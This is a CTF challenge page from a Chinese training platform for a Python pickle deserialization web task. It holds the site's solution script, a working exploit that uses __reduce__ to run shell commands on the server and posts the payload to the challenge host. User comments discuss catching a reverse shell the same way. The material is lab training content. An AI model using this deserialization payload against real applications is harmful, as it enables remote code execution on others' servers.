列表

详情

Python Pickle Unserializer

平台   WEB   已通过

题目作者: Hel1antHu5

一  血: ‌‌‌‌‌masterluo

一血奖励: 5金币

解  决: 58

提  示:

描  述: flag{}

站长题解:

import base64
import pickle

import httpx

class A:
    def __reduce__(self):
        import subprocess
        s = '''
import subprocess

r = subprocess.run(
    'cat flag', 
    shell=True,
    check=True,
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT
)
print(r.stdout.decode())
        '''
        return (subprocess.check_output, (["python3","-c",s],))


a = A()
data = {
    'payload': base64.b64encode(pickle.dumps(a)).decode()
}
a = base64.b64decode(data['payload'])
r = httpx.put('http://114.67.175.224:17271/flag', json=data)
print(r.text)

去做题

Cyberbolt @ 2023-06-07 23:21:07 👍1

最简方法 https://github.com/Cyberbolt/-WriteUp-Python-Pickle-Unserializer

jinmu @ 2023-06-07 23:21:07 👍0

前面有位师傅讲的很详细了。弹不了shell话可能真的是自己的问题,我是回滚了阿里云服务器的快照就好了。

samsung206bw @ 2023-06-07 23:21:07 👍0

终于无数次模拟后成功了

samsung206bw @ 2023-06-07 23:21:07 👍0

@XiLitter https://blog.csdn.net/prosche_1107/article/details/126840631?spm=1001.2014.3001.5501

samsung206bw @ 2023-06-07 23:21:07 👍0

@XiLitter 是的,需要搭建能公网访问的控制机,接收反弹的shell。注意: return (subprocess.call, (["python3","-c",s],))

XiLitter @ 2023-06-07 23:21:07 👍0

师傅,是不是需要自己来定义一个类,然后利用__reduce__来反弹shell,但是这样我没成功,还请师傅指点

云牧青 @ 2022-06-07 23:21:07 👍3

怎么做? 这靶机不通外网啊,感觉,wget个百度都半天没响应。而且也没回显啊,就是500报错,自己搭了一下,发现命令是执行了的,就是返回时报错了,报错信息是TypeError: The view function did not return a valid response. The return type must be a string, dict, tuple, Response inst

Fitz_临风 @ 2023-06-07 23:21:07 👍0

用subprocess 别用 os.system就好了

© 2024 ctf.bugku.com